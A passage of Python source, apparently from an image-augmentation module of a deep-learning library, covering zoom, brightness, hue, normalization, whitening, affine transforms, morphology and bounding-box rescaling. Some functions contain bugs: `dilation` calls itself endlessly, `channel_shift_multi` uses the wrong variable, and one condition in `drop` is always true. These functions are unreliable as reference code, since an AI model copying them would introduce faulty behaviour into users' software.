- If is_random=False, (h, w) are the fixed zoom factor for row and column axies, factor small than one is zoom in.
- If is_random=True, (h, w) are (min zoom out, max zoom out) for x and y with different random zoom in/out factor, e.g (0.5, 1) zoom in 1~2 times.
is_random : boolean
If True, randomly zoom. Default is False.
row_index col_index and channel_index : int
Index of row, col and channel, default (0, 1, 2), for theano (1, 2, 0).
fill_mode : str
Method to fill missing pixel, default `nearest`, more options `constant`, `reflect` or `wrap`, see `scipy ndimage affine_transform <https://docs.scipy.org/doc/scipy-0.14.0/reference/generated/scipy.ndimage.interpolation.affine_transform.html>`__
cval : float
Value used for points outside the boundaries of the input if mode='constant'. Default is 0.0.
order : int
The order of interpolation. The order has to be in the range 0-5. See ``tl.prepro.apply_transform`` and `scipy ndimage affine_transform <https://docs.scipy.org/doc/scipy-0.14.0/reference/generated/scipy.ndimage.interpolation.affine_transform.html>`__
Returns
-------
numpy.array
A processed image.
"""
if len(zoom_range) != 2:
raise Exception('zoom_range should be a tuple or list of two floats. ' 'Received arg: ', zoom_range)
if is_random:
if zoom_range[0] == 1 and zoom_range[1] == 1:
zx, zy = 1, 1
tl.logging.info(" random_zoom : not zoom in/out")
else:
zx, zy = np.random.uniform(zoom_range[0], zoom_range[1], 2)
else:
zx, zy = zoom_range
# tl.logging.info(zx, zy)
zoom_matrix = np.array([[zx, 0, 0], [0, zy, 0], [0, 0, 1]])
h, w = x.shape[row_index], x.shape[col_index]
transform_matrix = transform_matrix_offset_center(zoom_matrix, h, w)
x = apply_transform(x, transform_matrix, channel_index, fill_mode, cval, order)
return x
def zoom_multi(
x, zoom_range=(0.9, 1.1), is_random=False, row_index=0, col_index=1, channel_index=2, fill_mode='nearest',
cval=0., order=1
):
"""Zoom in and out of images with the same arguments, randomly or non-randomly.
Usually be used for image segmentation which x=[X, Y], X and Y should be matched.
Parameters
-----------
x : list of numpy.array
List of images with dimension of [n_images, row, col, channel] (default).
others : args
See ``tl.prepro.zoom``.
Returns
-------
numpy.array
A list of processed images.
"""
if len(zoom_range) != 2:
raise Exception('zoom_range should be a tuple or list of two floats. ' 'Received arg: ', zoom_range)
if is_random:
if zoom_range[0] == 1 and zoom_range[1] == 1:
zx, zy = 1, 1
tl.logging.info(" random_zoom : not zoom in/out")
else:
zx, zy = np.random.uniform(zoom_range[0], zoom_range[1], 2)
else:
zx, zy = zoom_range
zoom_matrix = np.array([[zx, 0, 0], [0, zy, 0], [0, 0, 1]])
h, w = x[0].shape[row_index], x[0].shape[col_index]
transform_matrix = transform_matrix_offset_center(zoom_matrix, h, w)
# x = apply_transform(x, transform_matrix, channel_index, fill_mode, cval)
# return x
results = []
for data in x:
results.append(apply_transform(data, transform_matrix, channel_index, fill_mode, cval, order))
return np.asarray(results)
# image = tf.image.random_brightness(image, max_delta=32. / 255.)
# image = tf.image.random_saturation(image, lower=0.5, upper=1.5)
# image = tf.image.random_hue(image, max_delta=0.032)
# image = tf.image.random_contrast(image, lower=0.5, upper=1.5)
def brightness(x, gamma=1, gain=1, is_random=False):
"""Change the brightness of a single image, randomly or non-randomly.
Parameters
-----------
x : numpy.array
An image with dimension of [row, col, channel] (default).
gamma : float
Non negative real number. Default value is 1.
- Small than 1 means brighter.
- If `is_random` is True, gamma in a range of (1-gamma, 1+gamma).
gain : float
The constant multiplier. Default value is 1.
is_random : boolean
If True, randomly change brightness. Default is False.
Returns
-------
numpy.array
A processed image.
References
-----------
- `skimage.exposure.adjust_gamma <http://scikit-image.org/docs/dev/api/skimage.exposure.html>`__
- `chinese blog <http://www.cnblogs.com/denny402/p/5124402.html>`__
"""
if is_random:
gamma = np.random.uniform(1 - gamma, 1 + gamma)
x = exposure.adjust_gamma(x, gamma, gain)
return x
def brightness_multi(x, gamma=1, gain=1, is_random=False):
"""Change the brightness of multiply images, randomly or non-randomly.
Usually be used for image segmentation which x=[X, Y], X and Y should be matched.
Parameters
-----------
x : list of numpyarray
List of images with dimension of [n_images, row, col, channel] (default).
others : args
See ``tl.prepro.brightness``.
Returns
-------
numpy.array
A list of processed images.
"""
if is_random:
gamma = np.random.uniform(1 - gamma, 1 + gamma)
results = []
for data in x:
results.append(exposure.adjust_gamma(data, gamma, gain))
return np.asarray(results)
def illumination(x, gamma=1., contrast=1., saturation=1., is_random=False):
"""Perform illumination augmentation for a single image, randomly or non-randomly.
Parameters
-----------
x : numpy.array
An image with dimension of [row, col, channel] (default).
gamma : float
Change brightness (the same with ``tl.prepro.brightness``)
- if is_random=False, one float number, small than one means brighter, greater than one means darker.
- if is_random=True, tuple of two float numbers, (min, max).
contrast : float
Change contrast.
- if is_random=False, one float number, small than one means blur.
- if is_random=True, tuple of two float numbers, (min, max).
saturation : float
Change saturation.
- if is_random=False, one float number, small than one means unsaturation.
- if is_random=True, tuple of two float numbers, (min, max).
is_random : boolean
If True, randomly change illumination. Default is False.
Returns
-------
numpy.array
A processed image.
Examples
---------
Random
>>> x = tl.prepro.illumination(x, gamma=(0.5, 5.0), contrast=(0.3, 1.0), saturation=(0.7, 1.0), is_random=True)
Non-random
>>> x = tl.prepro.illumination(x, 0.5, 0.6, 0.8, is_random=False)
"""
if is_random:
if not (len(gamma) == len(contrast) == len(saturation) == 2):
raise AssertionError("if is_random = True, the arguments are (min, max)")
## random change brightness # small --> brighter
illum_settings = np.random.randint(0, 3) # 0-brighter, 1-darker, 2 keep normal
if illum_settings == 0: # brighter
gamma = np.random.uniform(gamma[0], 1.0) # (.5, 1.0)
elif illum_settings == 1: # darker
gamma = np.random.uniform(1.0, gamma[1]) # (1.0, 5.0)
else:
gamma = 1
im_ = brightness(x, gamma=gamma, gain=1, is_random=False)
# tl.logging.info("using contrast and saturation")
image = PIL.Image.fromarray(im_) # array -> PIL
contrast_adjust = PIL.ImageEnhance.Contrast(image)
image = contrast_adjust.enhance(np.random.uniform(contrast[0], contrast[1])) #0.3,0.9))
saturation_adjust = PIL.ImageEnhance.Color(image)
image = saturation_adjust.enhance(np.random.uniform(saturation[0], saturation[1])) # (0.7,1.0))
im_ = np.array(image) # PIL -> array
else:
im_ = brightness(x, gamma=gamma, gain=1, is_random=False)
image = PIL.Image.fromarray(im_) # array -> PIL
contrast_adjust = PIL.ImageEnhance.Contrast(image)
image = contrast_adjust.enhance(contrast)
saturation_adjust = PIL.ImageEnhance.Color(image)
image = saturation_adjust.enhance(saturation)
im_ = np.array(image) # PIL -> array
return np.asarray(im_)
def rgb_to_hsv(rgb):
"""Input RGB image [0~255] return HSV image [0~1].
Parameters
------------
rgb : numpy.array
An image with values between 0 and 255.
Returns
-------
numpy.array
A processed image.
"""
# Translated from source of colorsys.rgb_to_hsv
# r,g,b should be a numpy arrays with values between 0 and 255
# rgb_to_hsv returns an array of floats between 0.0 and 1.0.
rgb = rgb.astype('float')
hsv = np.zeros_like(rgb)
# in case an RGBA array was passed, just copy the A channel
hsv[..., 3:] = rgb[..., 3:]
r, g, b = rgb[..., 0], rgb[..., 1], rgb[..., 2]
maxc = np.max(rgb[..., :3], axis=-1)
minc = np.min(rgb[..., :3], axis=-1)
hsv[..., 2] = maxc
mask = maxc != minc
hsv[mask, 1] = (maxc - minc)[mask] / maxc[mask]
rc = np.zeros_like(r)
gc = np.zeros_like(g)
bc = np.zeros_like(b)
rc[mask] = (maxc - r)[mask] / (maxc - minc)[mask]
gc[mask] = (maxc - g)[mask] / (maxc - minc)[mask]
bc[mask] = (maxc - b)[mask] / (maxc - minc)[mask]
hsv[..., 0] = np.select([r == maxc, g == maxc], [bc - gc, 2.0 + rc - bc], default=4.0 + gc - rc)
hsv[..., 0] = (hsv[..., 0] / 6.0) % 1.0
return hsv
def hsv_to_rgb(hsv):
"""Input HSV image [0~1] return RGB image [0~255].
Parameters
-------------
hsv : numpy.array
An image with values between 0.0 and 1.0
Returns
-------
numpy.array
A processed image.
"""
# Translated from source of colorsys.hsv_to_rgb
# h,s should be a numpy arrays with values between 0.0 and 1.0
# v should be a numpy array with values between 0.0 and 255.0
# hsv_to_rgb returns an array of uints between 0 and 255.
rgb = np.empty_like(hsv)
rgb[..., 3:] = hsv[..., 3:]
h, s, v = hsv[..., 0], hsv[..., 1], hsv[..., 2]
i = (h * 6.0).astype('uint8')
f = (h * 6.0) - i
p = v * (1.0 - s)
q = v * (1.0 - s * f)
t = v * (1.0 - s * (1.0 - f))
i = i % 6
conditions = [s == 0.0, i == 1, i == 2, i == 3, i == 4, i == 5]
rgb[..., 0] = np.select(conditions, [v, q, p, p, t, v], default=v)
rgb[..., 1] = np.select(conditions, [v, v, v, q, p, p], default=t)
rgb[..., 2] = np.select(conditions, [v, p, t, v, v, q], default=p)
return rgb.astype('uint8')
def adjust_hue(im, hout=0.66, is_offset=True, is_clip=True, is_random=False):
"""Adjust hue of an RGB image.
This is a convenience method that converts an RGB image to float representation, converts it to HSV, add an offset to the hue channel, converts back to RGB and then back to the original data type.
For TF, see `tf.image.adjust_hue <https://www.tensorflow.org/api_docs/python/tf/image/adjust_hue>`__.and `tf.image.random_hue <https://www.tensorflow.org/api_docs/python/tf/image/random_hue>`__.
Parameters
-----------
im : numpy.array
An image with values between 0 and 255.
hout : float
The scale value for adjusting hue.
- If is_offset is False, set all hue values to this value. 0 is red; 0.33 is green; 0.66 is blue.
- If is_offset is True, add this value as the offset to the hue channel.
is_offset : boolean
Whether `hout` is added on HSV as offset or not. Default is True.
is_clip : boolean
If HSV value smaller than 0, set to 0. Default is True.
is_random : boolean
If True, randomly change hue. Default is False.
Returns
-------
numpy.array
A processed image.
Examples
---------
Random, add a random value between -0.2 and 0.2 as the offset to every hue values.
>>> im_hue = tl.prepro.adjust_hue(image, hout=0.2, is_offset=True, is_random=False)
Non-random, make all hue to green.
>>> im_green = tl.prepro.adjust_hue(image, hout=0.66, is_offset=False, is_random=False)
References
-----------
- `tf.image.random_hue <https://www.tensorflow.org/api_docs/python/tf/image/random_hue>`__.
- `tf.image.adjust_hue <https://www.tensorflow.org/api_docs/python/tf/image/adjust_hue>`__.
- `StackOverflow: Changing image hue with python PIL <https://stackoverflow.com/questions/7274221/changing-image-hue-with-python-pil>`__.
"""
hsv = rgb_to_hsv(im)
if is_random:
hout = np.random.uniform(-hout, hout)
if is_offset:
hsv[..., 0] += hout
else:
hsv[..., 0] = hout
if is_clip:
hsv[..., 0] = np.clip(hsv[..., 0], 0, np.inf) # Hao : can remove green dots
rgb = hsv_to_rgb(hsv)
return rgb
# # contrast
# def constant(x, cutoff=0.5, gain=10, inv=False, is_random=False):
# # TODO
# x = exposure.adjust_sigmoid(x, cutoff=cutoff, gain=gain, inv=inv)
# return x
#
# def constant_multi():
# #TODO
# pass
def imresize(x, size=None, interp='bicubic', mode=None):
"""Resize an image by given output size and method.
Warning, this function will rescale the value to [0, 255].
Parameters
-----------
x : numpy.array
An image with dimension of [row, col, channel] (default).
size : list of 2 int or None
For height and width.
interp : str
Interpolation method for re-sizing (`nearest`, `lanczos`, `bilinear`, `bicubic` (default) or `cubic`).
mode : str
The PIL image mode (`P`, `L`, etc.) to convert arr before resizing.
Returns
-------
numpy.array
A processed image.
References
------------
- `scipy.misc.imresize <https://docs.scipy.org/doc/scipy/reference/generated/scipy.misc.imresize.html>`__
"""
if size is None:
size = [100, 100]
if x.shape[-1] == 1:
# greyscale
x = scipy.misc.imresize(x[:, :, 0], size, interp=interp, mode=mode)
return x[:, :, np.newaxis]
elif x.shape[-1] == 3:
# rgb, bgr ..
return scipy.misc.imresize(x, size, interp=interp, mode=mode)
else:
raise Exception("Unsupported channel %d" % x.shape[-1])
# value scale
def pixel_value_scale(im, val=0.9, clip=(-np.inf, np.inf), is_random=False):
"""Scales each value in the pixels of the image.
Parameters
-----------
im : numpy.array
An image.
val : float
The scale value for changing pixel value.
- If is_random=False, multiply this value with all pixels.
- If is_random=True, multiply a value between [1-val, 1+val] with all pixels.
clip : tuple of 2 numbers
The minimum and maximum value.
is_random : boolean
If True, see ``val``.
Returns
-------
numpy.array
A processed image.
Examples
----------
Random
>>> im = pixel_value_scale(im, 0.1, [0, 255], is_random=True)
Non-random
>>> im = pixel_value_scale(im, 0.9, [0, 255], is_random=False)
"""
if is_random:
scale = 1 + np.random.uniform(-val, val)
im = im * scale
else:
im = im * val
if len(clip) == 2:
im = np.clip(im, clip[0], clip[1])
else:
raise Exception("clip : tuple of 2 numbers")
return im
# normailization
def samplewise_norm(
x, rescale=None, samplewise_center=False, samplewise_std_normalization=False, channel_index=2, epsilon=1e-7
):
"""Normalize an image by rescale, samplewise centering and samplewise centering in order.
Parameters
-----------
x : numpy.array
An image with dimension of [row, col, channel] (default).
rescale : float
Rescaling factor. If None or 0, no rescaling is applied, otherwise we multiply the data by the value provided (before applying any other transformation)
samplewise_center : boolean
If True, set each sample mean to 0.
samplewise_std_normalization : boolean
If True, divide each input by its std.
epsilon : float
A small position value for dividing standard deviation.
Returns
-------
numpy.array
A processed image.
Examples
--------
>>> x = samplewise_norm(x, samplewise_center=True, samplewise_std_normalization=True)
>>> print(x.shape, np.mean(x), np.std(x))
(160, 176, 1), 0.0, 1.0
Notes
------
When samplewise_center and samplewise_std_normalization are True.
- For greyscale image, every pixels are subtracted and divided by the mean and std of whole image.
- For RGB image, every pixels are subtracted and divided by the mean and std of this pixel i.e. the mean and std of a pixel is 0 and 1.
"""
if rescale:
x *= rescale
if x.shape[channel_index] == 1:
# greyscale
if samplewise_center:
x = x - np.mean(x)
if samplewise_std_normalization:
x = x / np.std(x)
return x
elif x.shape[channel_index] == 3:
# rgb
if samplewise_center:
x = x - np.mean(x, axis=channel_index, keepdims=True)
if samplewise_std_normalization:
x = x / (np.std(x, axis=channel_index, keepdims=True) + epsilon)
return x
else:
raise Exception("Unsupported channels %d" % x.shape[channel_index])
def featurewise_norm(x, mean=None, std=None, epsilon=1e-7):
"""Normalize every pixels by the same given mean and std, which are usually
compute from all examples.
Parameters
-----------
x : numpy.array
An image with dimension of [row, col, channel] (default).
mean : float
Value for subtraction.
std : float
Value for division.
epsilon : float
A small position value for dividing standard deviation.
Returns
-------
numpy.array
A processed image.
"""
if mean:
x = x - mean
if std:
x = x / (std + epsilon)
return x
# whitening
def get_zca_whitening_principal_components_img(X):
"""Return the ZCA whitening principal components matrix.
Parameters
-----------
x : numpy.array
Batch of images with dimension of [n_example, row, col, channel] (default).
Returns
-------
numpy.array
A processed image.
"""
flatX = np.reshape(X, (X.shape[0], X.shape[1] * X.shape[2] * X.shape[3]))
tl.logging.info("zca : computing sigma ..")
sigma = np.dot(flatX.T, flatX) / flatX.shape[0]
tl.logging.info("zca : computing U, S and V ..")
U, S, _ = linalg.svd(sigma) # USV
tl.logging.info("zca : computing principal components ..")
principal_components = np.dot(np.dot(U, np.diag(1. / np.sqrt(S + 10e-7))), U.T)
return principal_components
def zca_whitening(x, principal_components):
"""Apply ZCA whitening on an image by given principal components matrix.
Parameters
-----------
x : numpy.array
An image with dimension of [row, col, channel] (default).
principal_components : matrix
Matrix from ``get_zca_whitening_principal_components_img``.
Returns
-------
numpy.array
A processed image.
"""
flatx = np.reshape(x, (x.size))
# tl.logging.info(principal_components.shape, x.shape) # ((28160, 28160), (160, 176, 1))
# flatx = np.reshape(x, (x.shape))
# flatx = np.reshape(x, (x.shape[0], ))
# tl.logging.info(flatx.shape) # (160, 176, 1)
whitex = np.dot(flatx, principal_components)
x = np.reshape(whitex, (x.shape[0], x.shape[1], x.shape[2]))
return x
# developing
# def barrel_transform(x, intensity):
# # https://github.com/fchollet/keras/blob/master/keras/preprocessing/image.py
# # TODO
# pass
#
# def barrel_transform_multi(x, intensity):
# # https://github.com/fchollet/keras/blob/master/keras/preprocessing/image.py
# # TODO
# pass
# channel shift
def channel_shift(x, intensity, is_random=False, channel_index=2):
"""Shift the channels of an image, randomly or non-randomly, see `numpy.rollaxis <https://docs.scipy.org/doc/numpy/reference/generated/numpy.rollaxis.html>`__.
Parameters
-----------
x : numpy.array
An image with dimension of [row, col, channel] (default).
intensity : float
Intensity of shifting.
is_random : boolean
If True, randomly shift. Default is False.
channel_index : int
Index of channel. Default is 2.
Returns
-------
numpy.array
A processed image.
"""
if is_random:
factor = np.random.uniform(-intensity, intensity)
else:
factor = intensity
x = np.rollaxis(x, channel_index, 0)
min_x, max_x = np.min(x), np.max(x)
channel_images = [np.clip(x_channel + factor, min_x, max_x) for x_channel in x]
x = np.stack(channel_images, axis=0)
x = np.rollaxis(x, 0, channel_index + 1)
return x
# x = np.rollaxis(x, channel_index, 0)
# min_x, max_x = np.min(x), np.max(x)
# channel_images = [np.clip(x_channel + np.random.uniform(-intensity, intensity), min_x, max_x)
# for x_channel in x]
# x = np.stack(channel_images, axis=0)
# x = np.rollaxis(x, 0, channel_index+1)
# return x
def channel_shift_multi(x, intensity, is_random=False, channel_index=2):
"""Shift the channels of images with the same arguments, randomly or non-randomly, see `numpy.rollaxis <https://docs.scipy.org/doc/numpy/reference/generated/numpy.rollaxis.html>`__.
Usually be used for image segmentation which x=[X, Y], X and Y should be matched.
Parameters
-----------
x : list of numpy.array
List of images with dimension of [n_images, row, col, channel] (default).
others : args
See ``tl.prepro.channel_shift``.
Returns
-------
numpy.array
A list of processed images.
"""
if is_random:
factor = np.random.uniform(-intensity, intensity)
else:
factor = intensity
results = []
for data in x:
data = np.rollaxis(data, channel_index, 0)
min_x, max_x = np.min(data), np.max(data)
channel_images = [np.clip(x_channel + factor, min_x, max_x) for x_channel in x]
data = np.stack(channel_images, axis=0)
data = np.rollaxis(x, 0, channel_index + 1)
results.append(data)
return np.asarray(results)
# noise
def drop(x, keep=0.5):
"""Randomly set some pixels to zero by a given keeping probability.
Parameters
-----------
x : numpy.array
An image with dimension of [row, col, channel] or [row, col].
keep : float
The keeping probability (0, 1), the lower more values will be set to zero.
Returns
-------
numpy.array
A processed image.
"""
if len(x.shape) == 3:
if x.shape[-1] == 3: # color
img_size = x.shape
mask = np.random.binomial(n=1, p=keep, size=x.shape[:-1])
for i in range(3):
x[:, :, i] = np.multiply(x[:, :, i], mask)
elif x.shape[-1] == 1: # greyscale image
img_size = x.shape
x = np.multiply(x, np.random.binomial(n=1, p=keep, size=img_size))
else:
raise Exception("Unsupported shape {}".format(x.shape))
elif len(x.shape) == 2 or 1: # greyscale matrix (image) or vector
img_size = x.shape
x = np.multiply(x, np.random.binomial(n=1, p=keep, size=img_size))
else:
raise Exception("Unsupported shape {}".format(x.shape))
return x
# x = np.asarray([[1,2,3,4,5,6,7,8,9,10],[1,2,3,4,5,6,7,8,9,10]])
# x = np.asarray([x,x,x,x,x,x])
# x.shape = 10, 4, 3
# tl.logging.info(x)
# # exit()
# tl.logging.info(x.shape)
# # exit()
# tl.logging.info(drop(x, keep=1.))
# exit()
# manual transform
def transform_matrix_offset_center(matrix, x, y):
"""Return transform matrix offset center.
Parameters
----------
matrix : numpy.array
Transform matrix.
x and y : 2 int
Size of image.
Returns
-------
numpy.array
The transform matrix.
Examples
--------
- See ``tl.prepro.rotation``, ``tl.prepro.shear``, ``tl.prepro.zoom``.
"""
o_x = float(x) / 2 + 0.5
o_y = float(y) / 2 + 0.5
offset_matrix = np.array([[1, 0, o_x], [0, 1, o_y], [0, 0, 1]])
reset_matrix = np.array([[1, 0, -o_x], [0, 1, -o_y], [0, 0, 1]])
transform_matrix = np.dot(np.dot(offset_matrix, matrix), reset_matrix)
return transform_matrix
def apply_transform(x, transform_matrix, channel_index=2, fill_mode='nearest', cval=0., order=1):
"""Return transformed images by given ``transform_matrix`` from ``transform_matrix_offset_center``.
Parameters
----------
x : numpy.array
An image with dimension of [row, col, channel] (default).
transform_matrix : numpy.array
Transform matrix (offset center), can be generated by ``transform_matrix_offset_center``
channel_index : int
Index of channel, default 2.
fill_mode : str
Method to fill missing pixel, default `nearest`, more options `constant`, `reflect` or `wrap`, see `scipy ndimage affine_transform <https://docs.scipy.org/doc/scipy-0.14.0/reference/generated/scipy.ndimage.interpolation.affine_transform.html>`__
cval : float
Value used for points outside the boundaries of the input if mode='constant'. Default is 0.0
order : int
The order of interpolation. The order has to be in the range 0-5:
- 0 Nearest-neighbor
- 1 Bi-linear (default)
- 2 Bi-quadratic
- 3 Bi-cubic
- 4 Bi-quartic
- 5 Bi-quintic
- `scipy ndimage affine_transform <https://docs.scipy.org/doc/scipy-0.14.0/reference/generated/scipy.ndimage.interpolation.affine_transform.html>`__
Returns
-------
numpy.array
A processed image.
Examples
--------
- See ``tl.prepro.rotation``, ``tl.prepro.shift``, ``tl.prepro.shear``, ``tl.prepro.zoom``.
"""
x = np.rollaxis(x, channel_index, 0)
final_affine_matrix = transform_matrix[:2, :2]
final_offset = transform_matrix[:2, 2]
channel_images = [
ndi.interpolation.affine_transform(
x_channel, final_affine_matrix, final_offset, order=order, mode=fill_mode, cval=cval
) for x_channel in x
]
x = np.stack(channel_images, axis=0)
x = np.rollaxis(x, 0, channel_index + 1)
return x
def projective_transform_by_points(
x, src, dst, map_args=None, output_shape=None, order=1, mode='constant', cval=0.0, clip=True,
preserve_range=False
):
"""Projective transform by given coordinates, usually 4 coordinates.
see `scikit-image <http://scikit-image.org/docs/dev/auto_examples/applications/plot_geometric.html>`__.
Parameters
-----------
x : numpy.array
An image with dimension of [row, col, channel] (default).
src : list or numpy
The original coordinates, usually 4 coordinates of (width, height).
dst : list or numpy
The coordinates after transformation, the number of coordinates is the same with src.
map_args : dictionary or None
Keyword arguments passed to inverse map.
output_shape : tuple of 2 int
Shape of the output image generated. By default the shape of the input image is preserved. Note that, even for multi-band images, only rows and columns need to be specified.
order : int
The order of interpolation. The order has to be in the range 0-5:
- 0 Nearest-neighbor
- 1 Bi-linear (default)
- 2 Bi-quadratic
- 3 Bi-cubic
- 4 Bi-quartic
- 5 Bi-quintic
mode : str
One of `constant` (default), `edge`, `symmetric`, `reflect` or `wrap`.
Points outside the boundaries of the input are filled according to the given mode. Modes match the behaviour of numpy.pad.
cval : float
Used in conjunction with mode `constant`, the value outside the image boundaries.
clip : boolean
Whether to clip the output to the range of values of the input image. This is enabled by default, since higher order interpolation may produce values outside the given input range.
preserve_range : boolean
Whether to keep the original range of values. Otherwise, the input image is converted according to the conventions of img_as_float.
Returns
-------
numpy.array
A processed image.
Examples
--------
Assume X is an image from CIFAR-10, i.e. shape == (32, 32, 3)
>>> src = [[0,0],[0,32],[32,0],[32,32]] # [w, h]
>>> dst = [[10,10],[0,32],[32,0],[32,32]]
>>> x = tl.prepro.projective_transform_by_points(X, src, dst)
References
-----------
- `scikit-image : geometric transformations <http://scikit-image.org/docs/dev/auto_examples/applications/plot_geometric.html>`__
- `scikit-image : examples <http://scikit-image.org/docs/dev/auto_examples/index.html>`__
"""
if map_args is None:
map_args = {}
# if type(src) is list:
if isinstance(src, list): # convert to numpy
src = np.array(src)
# if type(dst) is list:
if isinstance(dst, list):
dst = np.array(dst)
if np.max(x) > 1: # convert to [0, 1]
x = x / 255
m = transform.ProjectiveTransform()
m.estimate(dst, src)
warped = transform.warp(
x, m, map_args=map_args, output_shape=output_shape, order=order, mode=mode, cval=cval, clip=clip,
preserve_range=preserve_range
)
return warped
# Numpy and PIL
def array_to_img(x, dim_ordering=(0, 1, 2), scale=True):
"""Converts a numpy array to PIL image object (uint8 format).
Parameters
----------
x : numpy.array
An image with dimension of 3 and channels of 1 or 3.
dim_ordering : tuple of 3 int
Index of row, col and channel, default (0, 1, 2), for theano (1, 2, 0).
scale : boolean
If True, converts image to [0, 255] from any range of value like [-1, 2]. Default is True.
Returns
-------
PIL.image
An image.
References
-----------
`PIL Image.fromarray <http://pillow.readthedocs.io/en/3.1.x/reference/Image.html?highlight=fromarray>`__
"""
# if dim_ordering == 'default':
# dim_ordering = K.image_dim_ordering()
# if dim_ordering == 'th': # theano
# x = x.transpose(1, 2, 0)
x = x.transpose(dim_ordering)
if scale:
x += max(-np.min(x), 0)
x_max = np.max(x)
if x_max != 0:
# tl.logging.info(x_max)
# x /= x_max
x = x / x_max
x *= 255
if x.shape[2] == 3:
# RGB
return PIL.Image.fromarray(x.astype('uint8'), 'RGB')
elif x.shape[2] == 1:
# grayscale
return PIL.Image.fromarray(x[:, :, 0].astype('uint8'), 'L')
else:
raise Exception('Unsupported channel number: ', x.shape[2])
def find_contours(x, level=0.8, fully_connected='low', positive_orientation='low'):
"""Find iso-valued contours in a 2D array for a given level value, returns list of (n, 2)-ndarrays
see `skimage.measure.find_contours <http://scikit-image.org/docs/dev/api/skimage.measure.html#skimage.measure.find_contours>`__.
Parameters
------------
x : 2D ndarray of double.
Input data in which to find contours.
level : float
Value along which to find contours in the array.
fully_connected : str
Either `low` or `high`. Indicates whether array elements below the given level value are to be considered fully-connected (and hence elements above the value will only be face connected), or vice-versa. (See notes below for details.)
positive_orientation : str
Either `low` or `high`. Indicates whether the output contours will produce positively-oriented polygons around islands of low- or high-valued elements. If `low` then contours will wind counter-clockwise around elements below the iso-value. Alternately, this means that low-valued elements are always on the left of the contour.
Returns
--------
list of (n,2)-ndarrays
Each contour is an ndarray of shape (n, 2), consisting of n (row, column) coordinates along the contour.
"""
return skimage.measure.find_contours(
x, level, fully_connected=fully_connected, positive_orientation=positive_orientation
)
def pt2map(list_points=None, size=(100, 100), val=1):
"""Inputs a list of points, return a 2D image.
Parameters
--------------
list_points : list of 2 int
[[x, y], [x, y]..] for point coordinates.
size : tuple of 2 int
(w, h) for output size.
val : float or int
For the contour value.
Returns
-------
numpy.array
An image.
"""
if list_points is None:
raise Exception("list_points : list of 2 int")
i_m = np.zeros(size)
if len(list_points) == 0:
return i_m
for xx in list_points:
for x in xx:
# tl.logging.info(x)
i_m[int(np.round(x[0]))][int(np.round(x[1]))] = val
return i_m
def binary_dilation(x, radius=3):
"""Return fast binary morphological dilation of an image.
see `skimage.morphology.binary_dilation <http://scikit-image.org/docs/dev/api/skimage.morphology.html#skimage.morphology.binary_dilation>`__.
Parameters
-----------
x : 2D array
A binary image.
radius : int
For the radius of mask.
Returns
-------
numpy.array
A processed binary image.
"""
mask = disk(radius)
x = _binary_dilation(x, selem=mask)
return x
def dilation(x, radius=3):
"""Return greyscale morphological dilation of an image,
see `skimage.morphology.dilation <http://scikit-image.org/docs/dev/api/skimage.morphology.html#skimage.morphology.dilation>`__.
Parameters
-----------
x : 2D array
An greyscale image.
radius : int
For the radius of mask.
Returns
-------
numpy.array
A processed greyscale image.
"""
mask = disk(radius)
x = dilation(x, selem=mask)
return x
def binary_erosion(x, radius=3):
"""Return binary morphological erosion of an image,
see `skimage.morphology.binary_erosion <http://scikit-image.org/docs/dev/api/skimage.morphology.html#skimage.morphology.binary_erosion>`__.
Parameters
-----------
x : 2D array
A binary image.
radius : int
For the radius of mask.
Returns
-------
numpy.array
A processed binary image.
"""
mask = disk(radius)
x = _binary_erosion(x, selem=mask)
return x
def erosion(x, radius=3):
"""Return greyscale morphological erosion of an image,
see `skimage.morphology.erosion <http://scikit-image.org/docs/dev/api/skimage.morphology.html#skimage.morphology.erosion>`__.
Parameters
-----------
x : 2D array
A greyscale image.
radius : int
For the radius of mask.
Returns
-------
numpy.array
A processed greyscale image.
"""
mask = disk(radius)
x = _erosion(x, selem=mask)
return x
def obj_box_coords_rescale(coords=None, shape=None):
"""Scale down a list of coordinates from pixel unit to the ratio of image size i.e. in the range of [0, 1].
Parameters
------------
coords : list of list of 4 ints or None
For coordinates of more than one images .e.g.[[x, y, w, h], [x, y, w, h], ...].
shape : list of 2 int or None
【height, width].
Returns
-------
list of list of 4 numbers
A list of new bounding boxes.
Examples
---------
>>> coords = obj_box_coords_rescale(coords=[[30, 40, 50, 50], [10, 10, 20, 20]], shape=[100, 100])
>>> print(coords)
[[0.3, 0.4, 0.5, 0.5], [0.1, 0.1, 0.2, 0.2]]
>>> coords = obj_box_coords_rescale(coords=[[30, 40, 50, 50]], shape=[50, 100])
>>> print(coords)
[[0.3, 0.8, 0.5, 1.0]]
>>> coords = obj_box_coords_rescale(coords=[[30, 40, 50, 50]], shape=[100, 200])
>>> print(coords)
[[0.15, 0.4, 0.25, 0.5]]
Returns
-------
list of 4 numbers
New coordinates.
"""
if coords is None:
coords = []
if shape is None:
shape = [100, 200]
imh, imw = shape[0], shape[1]
imh = imh * 1.0 # * 1.0 for python2 : force division to be float point
imw = imw * 1.0
coords_new = list()
for coord in coords:
if len(coord) != 4:
raise AssertionError("coordinate should be 4 values : [x, y, w, h]")
x = coord[0] / imw
y = coord[1] / imh
w = coord[2] / imw
h = coord[3] / imh
coords_new.append([x, y, w, h])
return coords_new
def obj_box_coord_rescale(coord=None, shape=None):
"""Scale down one coordinates from pixel unit to the ratio of image size i.e. in the range of [0, 1].
It is the reverse process of ``obj_box_coord_scale_to_pixelunit``.
Parameters
------------
coords : list of 4 int or None
One coordinates of one image e.g. [x, y, w, h].
shape : list of 2 int or None
For [height, width].
Returns
-------
list of 4 numbers
New bounding box.
Examples
---------
>>> coord = tl.prepro.obj_box_coord_rescale(coord=[30, 40, 50, 50], shape=[100, 100])
[0.3, 0.4, 0.5, 0.5]
"""
if coord is None:
coord = []
if shape is None:
shape = [100, 200]
return obj_box_coords_rescale(coords=[coord], shape=shape)[0]
def obj_box_coord_scale_to_pixelunit(coord, shape=None):
"""Convert one coordinate [x, y, w (or x2), h (or y2)] in ratio format to image coordinate format.
It is the reverse process of ``obj_box_coord_rescale``.
Parameters
-----------
coord : list of 4 float
One coordinate of one image [x, y, w (or x2), h (or y2)] in ratio format, i.e value range [0~1].
shape : tuple of 2 or None
For [height, width].
Returns
-------
list of 4 numbers
New bounding box.
Examples
---------
>>> x, y, x2, y2 = tl.prepro.obj_box_coord_scale_to_pixelunit([0.2, 0.3, 0.5, 0.7], shape=(100, 200, 3))
[40, 30, 100, 70]
"""
if shape is None:
shape = [100, 100]
imh, imw = shape[0:2]
x = int(coord[0] * imw)
x2 = int(coord[2] * imw)
